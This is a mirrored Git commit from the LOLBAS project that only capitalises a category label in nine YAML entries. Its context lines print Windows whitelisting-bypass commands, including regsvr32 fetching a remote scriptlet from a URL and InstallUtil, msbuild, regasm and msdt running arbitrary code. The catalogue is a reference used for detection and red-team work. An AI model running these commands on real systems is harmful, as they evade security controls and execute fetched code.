mirror/ LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-06-09 00:06:04 +02:00
Code Issues

Correcting 'AWL bypass' to 'AWL Bypass'

This commit is contained in:
xenoscr 2022-09-10 22:55:32 -04:00
parent 8dd8928a8f
commit 0ed1694bf1
No known key found for this signature in database
GPG Key ID: 52C26F96860C0DAA
9 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSBinaries/Dfsvc.yml
View File

@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OSBinaries/Installutil.yml
View File

@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OSBinaries/Msbuild.yml
View File

@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OSBinaries/Msdt.yml
View File

@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OSBinaries/Regasm.yml
View File

@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OSBinaries/Regsvcs.yml
View File

@ -14,7 +14,7 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

4
yml/OSBinaries/Regsvr32.yml
View File

@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OSLibraries/Dfshim.yml
View File

@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

2
yml/OtherMSBinaries/Msdeploy.yml
View File

@ -14,7 +14,7 @@ Commands:
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows server